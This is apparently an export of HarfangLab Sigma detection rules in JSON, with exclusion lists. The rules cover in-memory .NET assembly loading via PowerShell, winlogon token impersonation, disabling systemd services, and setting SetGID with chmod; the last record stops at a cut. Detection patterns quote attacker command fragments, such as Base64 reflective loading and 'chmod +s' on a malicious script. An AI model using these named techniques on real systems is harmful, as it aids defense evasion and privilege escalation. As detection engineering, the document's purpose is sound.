"creation_date": "2026-03-23T11:45:34.624000Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624004Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://capturethetalent.co.uk/evading-defender-using-reflective-dll-loading/",
"https://attack.mitre.org/techniques/T1620/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1620_powershell_assembly_loader.yml",
"content": "title: .NET Reflection via PowerShell\nid: 3fb86f3f-25bc-4b7f-916b-aa47252ab35f\ndescription: |\n Detects a specific PowerShell command used to load .NET assemblies.\n Attackers can use this technique to load malicious code without writing it to the disk hoping to bypass security solutions.\n It is recommended to verify the legitimacy of this command with the help of PowerShell telemetry.\nreferences:\n - https://capturethetalent.co.uk/evading-defender-using-reflective-dll-loading/\n - https://attack.mitre.org/techniques/T1620/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2023/09/29\nmodified: 2026/03/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - '[System.Reflection.Assembly]::Load([Convert]::FromBase64String('\n - '[System.Reflection.Assembly]::Load($'\n - '[System.Reflection.Assembly]::Load([byte[]]'\n - '[System.Reflection.Assembly]::(?daoL?'\n\n exclusion_share:\n ProcessParentImage|startswith: '\\\\\\\\'\n\n exclusion_forms:\n PowershellCommand|contains: '[System.Windows.Forms.OpenFileDialog]::new()'\n\n # https://www.rudder.io\n exclusion_rudder:\n PowershellCommand|contains|all:\n - '$assembly = [System.Reflection.Assembly]::Load($assemblyBytes)'\n - '[System.AppDomain]::CurrentDomain.remove_AssemblyResolve($onAssemblyResolveEventHandler)'\n - 'function Load-Rudder'\n\n # https://github.com/Mr-Un1k0d3r/ATP-PowerShell-Scripts/blob/main/0e3d6d2d-06cc-486d-9465-9ef3bee75444.ps1\n exclusion_atp1:\n PowershellCommand|contains|all:\n - '$assembly = [System.Reflection.Assembly]::Load($bytes)'\n - 'Loaded DdcHelper library, call RunDdcExe to launch OpenHandleCollector'\n - '$exitCode = 
$safeExeLauncher.RunDdcExe('\n exclusion_atp2:\n PowershellCommand|contains|all:\n - '# See readme for details'\n - '$bytes[$i] = $bytes[$i] -bxor 0x4'\n - '$assembly = [System.Reflection.Assembly]::Load($bytes)'\n\n # https://www.powershellgallery.com/packages/SqlServerDsc/15.2.0/Content/Modules%5CSqlServerDsc.Common%5CSqlServerDsc.Common.psm1\n exclusion_sqlserver1:\n PowershellCommand|contains|all:\n - 'missing assembly in the module SqlServer this is still needed.'\n - '$connectionInfo = New-Object -TypeName ?Microsoft.SqlServer.Management.Common.ServerConnection? -ArgumentList @(?testclu01a\\SQL2014?)'\n - '$assemblyInformation = [System.Reflection.Assembly]::Load('\n exclusion_sqlserver2:\n PowershellCommand|contains|all:\n - '[System.Reflection.Assembly]::Load('\n - 'Returns the major SQL version for the specific instance.'\n - 'function Get-SqlInstanceMajorVersion'\n\n exclusion_tanium:\n PowershellCommand|contains|all:\n - 'function Load-Assembly {'\n - '$RegPath = ?Registry::HKEY_CURRENT_USER\\Ephemeral?'\n - '[System.Reflection.Assembly]::Load($AssemblyData.ToArray())'\n ProcessAncestors|contains:\n - '|?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumCX.exe|'\n - '|?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe|'\n\n exclusion_function_load_assembly:\n # Hash of the PowerShell Load-Assembly function (internal to PowerShell itself).\n Sha256: '19a89bd7446491a45b3de150803d79e4240c087dd40e9def00c6d950b05e0ede'\n\n exclusion_fujifilm_healthcare:\n PowershellScriptPath: '?:\\Users\\\\*\\AppData\\Local\\Temp\\7z*\\x64\\InstallationScripts\\UtilLib.ps1'\n ProcessAncestors|contains: '|?:\\Windows\\SysWOW64\\cmd.exe|?:\\VOL?\\\\*-Release.exe|?:\\Windows\\explorer.exe|'\n\n exclusion_serviceportalagent:\n ProcessImage:\n - '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\current\\emulator\\MmrAgent.NetFxEmulator.exe'\n - 
'?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\current\\ServicePortalAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_refreshit:\n ProcessParentImage: '?:\\Program Files\\Refresh IT Solutions\\Refresh Deployment Manager PowerShell Host\\Refresh.Common.PowerShell.Host.Server7.exe'\n\n exclusion_citrix:\n - ProcessParentImage: '?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe'\n - PowershellScriptPath|endswith: '\\UpmConfigCheck.ps1'\n PowershellCommand|contains|all:\n - 'function Import-LogParser {'\n - '# version: Citrix.Cloud.WEM.AdminTool/master/'\n\n exclusion_vscode:\n ProcessParentImage:\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n\n exclusion_visualstudio:\n # C:\\Program Files\\Microsoft Visual Studio\\2022\\Enterprise\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Dotnet.x64\\ServiceHub.Host.dotnet.x64.exe\n # C:\\Program Files\\Microsoft Visual Studio\\18\\Community\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Extensibility.amd64\\DevHub.exe\n ProcessParentImage|startswith: '?:\\Program Files\\Microsoft Visual Studio\\'\n ProcessParentOriginalFileName:\n - 'ServiceHub.Host.dotnet.x64.dll'\n - 'DevHub.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3fb86f3f-25bc-4b7f-916b-aa47252ab35f",
"rule_name": ".NET Reflection via PowerShell",
"rule_description": "Detects a specific PowerShell command used to load .NET assemblies.\nAttackers can use this technique to load malicious code without writing it to the disk hoping to bypass security solutions.\nIt is recommended to verify the legitimacy of this command with the help of PowerShell telemetry.\n",
"rule_creation_date": "2023-09-29",
"rule_modified_date": "2026-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ff2416a-e32c-45f4-b1ec-f1d61b14d607",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093254Z",
"creation_date": "2026-03-23T11:45:34.093256Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://eversinc33.com/posts/windows-access-tokens/",
"https://attack.mitre.org/techniques/T1134/001/"
],
"name": "t1134_001_winlogon_access_token_impersonation.yml",
"content": "title: Winlogon Access Token Impersonation Detected\nid: 3ff2416a-e32c-45f4-b1ec-f1d61b14d607\ndescription: |\n Detects a suspicious attempt to elevate privileges to local SYSTEM via an access token impersonation of winlogon.exe.\n Token impersonation is a technique through which a Windows local administrator could steal another user's security token in order to impersonate and effectively execute commands as that user.\n It is recommended to analyze the behavior and content of both the parent and the child processes to search for malicious actions.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://eversinc33.com/posts/windows-access-tokens/\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2024/04/19\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1134.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n ProcessIntegrityLevel: 'High'\n TargetImage: '?:\\Windows\\System32\\winlogon.exe'\n GrantedAccessStr: \"PROCESS_DUP_HANDLE\"\n\n filter_microsoft:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_program_files:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_tokenbroker:\n TargetProcessCommandLine: '?:\\windows\\system32\\svchost.exe -k netsvcs -p -s TokenBroker'\n\n exclusion_freefilesync:\n ProcessProduct: 'FreeFileSync'\n ProcessSigned: 'true'\n ProcessSignature: 'Florian BAUER'\n\n exclusion_handle:\n ProcessOriginalFileName: 'Nthandle.exe'\n ProcessSigned: 'true'\n ProcessSignature: 
'Sysinternals'\n\n exclusion_runtimebroker:\n ProcessImage: '?:\\Windows\\System32\\RuntimeBroker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_aomei:\n ProcessImage|endswith: '\\AmanCpFile.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'AOMEI International Network Limited'\n\n exclusion_procexp:\n ProcessOriginalFileName: 'Procexp.exe'\n ProcessProduct: 'Process Explorer'\n ProcessCompany:\n - 'Sysinternals'\n - 'Sysinternals - www.sysinternals.com'\n\n exclusion_adobe:\n ProcessImage: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\CreativeCloudSet-Up.exe'\n ProcessParentImage: '?:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Desktop Common\\ElevationManager\\AdobeUpdateService.exe'\n\n exclusion_systracer:\n ProcessImage: '?:\\Program Files\\SysTracer\\SysTracer.exe'\n ProcessOriginalFileName: 'SysTracer.EXE'\n ProcessCompany: 'Blue Project Software'\n\n exclusion_perfmon:\n ProcessImage: '?:\\Windows\\System32\\perfmon.exe'\n CallTrace|contains: '|?:\\Windows\\System32\\KernelBase.dll+*|?:\\Windows\\System32\\wdc.dll+*|?:\\Windows\\System32\\wdc.dll+*|?:\\Windows\\System32\\kernel32.dll+*|'\n\n exclusion_dropbox:\n ProcessOriginalFileName: 'Dropbox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Dropbox, Inc'\n\n exclusion_eraser:\n ProcessOriginalFileName: 'Eraser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Heidi Computers Ltd'\n\n exclusion_ibm:\n # C:\\Program Files (x86)\\IBM\\Notes\\nsd.exe\n ProcessOriginalFileName: 'wnsd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'International Business Machines Corporation'\n\n exclusion_bitdefender:\n # C:\\Program Files\\Bitdefender\\Bitdefender Security App\\bdagent.exe\n ProcessOriginalFileName: 'bdagent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Bitdefender SRL'\n\n exclusion_mitel:\n ProcessImage|endswith: '*\\MitelManagerClient\\Update.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mitel France'\n\n exclusion_greenshot:\n 
ProcessOriginalFileName: 'Greenshot.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, Robin Krom'\n\n exclusion_multi_commander:\n ProcessImage: '?:\\Program Files\\MultiCommander (x64)\\MultiCommander.exe'\n ProcessOriginalFileName: 'MultiCommander.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ff2416a-e32c-45f4-b1ec-f1d61b14d607",
"rule_name": "Winlogon Access Token Impersonation Detected",
"rule_description": "Detects a suspicious attempt to elevate privileges to local SYSTEM via an access token impersonation of winlogon.exe.\nToken impersonation is a technique through which a Windows local administrator could steal another user's security token in order to impersonate and effectively execute commands as that user.\nIt is recommended to analyze the behavior and content of both the parent and the child processes to search for malicious actions.\n",
"rule_creation_date": "2024-04-19",
"rule_modified_date": "2025-04-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1134.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4030d3e4-9b06-4b18-a6a2-04f077cafbe5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.578321Z",
"creation_date": "2026-03-23T11:45:35.294424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294431Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1489/",
"https://attack.mitre.org/techniques/T1569/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1489_systemd_service_disabled.yml",
"content": "title: SystemD Service Disabled\nid: 4030d3e4-9b06-4b18-a6a2-04f077cafbe5\ndescription: |\n Detects when a systemd service is manually disabled.\n Adversaries may disable services on a system to render those services unavailable to legitimate users or to impair the security tools already installed.\n It is recommended to ensure that both a legitimate administrator disabled this service and that the service is not critical.\n Additionally, it is recommended to investigate the process responsible for the disabling of the service to look for malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1489/\n - https://attack.mitre.org/techniques/T1569/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1489\n - attack.execution\n - attack.t1569\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/systemctl'\n CommandLine|contains: ' disable '\n ParentImage|contains: '?'\n\n filter_other_rules:\n CommandLine|contains:\n # This is handled by another other 4bad3446-0e5e-44b4-9fd5-3bb35c6d7625\n - 'ufw'\n - 'firewalld'\n # This is handled by another other 8ff98ac0-e971-4cd5-8393-79bb8a209cd3\n - 'rsyslog'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors: '|/usr/bin/dpkg|'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - 
ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n\n exclusion_rpm:\n - ProcessParentCommandLine: '/bin/sh /var/tmp/rpm-tmp.*'\n - ProcessGrandparentCommandLine: '/bin/sh /var/tmp/rpm-tmp.*'\n - ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_eset:\n - CommandLine: 'systemctl disable eraagent.service'\n CurrentDirectory: '/opt/eset/RemoteAdministrator/Agent/'\n - GrandparentImage: '/opt/eset/efs/lib/execd'\n\n exclusion_k3s:\n ProcessCommandLine: 'systemctl disable k3s-agent'\n\n exclusion_bitdefender_install:\n CommandLine|contains: 'bdsec-arrakis'\n ParentImage: '/usr/bin/??sh'\n ParentCommandLine|contains:\n - '/installer'\n - '/uninstall'\n - '/opt/bitdefender-security-tools/bin/'\n CurrentDirectory|contains: '/bitdefender'\n\n exclusion_fsecure:\n - ProcessParentImage|startswith: '/opt/f-secure/'\n - ProcessGrandparentImage|startswith: '/opt/f-secure/'\n - ProcessParentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n\n exclusion_wazo_monit:\n ProcessCommandLine: 'systemctl disable monit'\n ProcessParentCommandLine: '/bin/bash /bin/wazo-service disable'\n\n exclusion_authconfig_nscd:\n ProcessCommandLine: '/bin/systemctl disable nscd.service'\n ProcessGrandparentCommandLine|startswith: '/usr/bin/python /sbin/authconfig '\n\n exclusion_manageengine:\n ProcessParentImage: 
'/usr/local/manageengine/uems_agent/bin/dcservice'\n\n exclusion_puppet:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n exclusion_azuremonitor:\n - CommandLine|startswith: 'systemctl disable azuremonitor'\n - CurrentDirectory|startswith: '/var/lib/waagent/Microsoft.'\n\n exclusion_bulkproxy:\n CommandLine|startswith: 'systemctl disable bulkproxy'\n\n exclusion_3cxpbx:\n Ancestors|endswith: '/usr/lib/3cxpbx/CloudServicesWatcher|/usr/lib/systemd/systemd'\n\n exclusion_cybereason:\n ProcessParentImage: '/opt/cybereason/sensor/bin/cybereason-sensor'\n\n exclusion_rancher:\n CommandLine:\n - 'systemctl disable rke2-agent'\n - 'systemctl disable rke2-server'\n - 'systemctl disable rancher-system-agent'\n ProcessParentCommandLine|endswith:\n - '/bin/sh */bin/rke2-uninstall.sh'\n - '/bin/sh */bin/rancher-system-agent-uninstall.sh'\n\n exclusion_listchanges:\n CommandLine: 'systemctl disable apt-listchanges.timer'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n exclusion_trendmicro:\n ProcessParentImage: '/opt/TrendMicro/EndpointBasecamp/bin/tmxbc'\n\n exclusion_sme_server:\n CommandLine: 'systemctl disable ARID_entry'\n ParentCommandLine: '/usr/bin/perl -w /sbin/e-smith/signal-event.perl post-sync'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/microfocus/Discovery/.discagnt/udscan|'\n - '|/opt/VRTSvcs/bin/Script51Agent|'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4030d3e4-9b06-4b18-a6a2-04f077cafbe5",
"rule_name": "SystemD Service Disabled",
"rule_description": "Detects when a systemd service is manually disabled.\nAdversaries may disable services on a system to render those services unavailable to legitimate users or to impair the security tools already installed.\nIt is recommended to ensure that both a legitimate administrator disabled this service and that the service is not critical.\nAdditionally, it is recommended to investigate the process responsible for the disabling of the service to look for malicious content or actions.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40584aef-d0d3-4764-9876-2e1f95ad821a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.601600Z",
"creation_date": "2026-03-23T11:45:34.095839Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095844Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_chmod_setgid_linux.yml",
"content": "title: SetGID Access Flag Set via chmod/setcap\nid: 40584aef-d0d3-4764-9876-2e1f95ad821a\ndescription: |\n Detects chmod and setcap being used to set the SetGID bit or capability on a file.\n Attackers can set the SetGID bit on a file to execute a it with a different (and potentially more privileged) group context.\n It is recommended to investigate the file having its characteristics modified, as well as potential executions of this file to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/09/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Chmod\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_chmod:\n # chmod +s /home/user/malicious_script.sh\n # chmod ug+s /home/user/malicious_script.sh\n # chmod g+s /home/user/malicious_script.sh\n # chmod 4644 /home/user/malicious_script.sh\n # chmod 6644 /home/user/malicious_script.sh\n Image|endswith: '/chmod'\n CommandLine|contains:\n - 'chmod +s'\n - 'chmod ug+s'\n - 'chmod g+s'\n - 'chmod 2??? '\n - 'chmod 6??? 
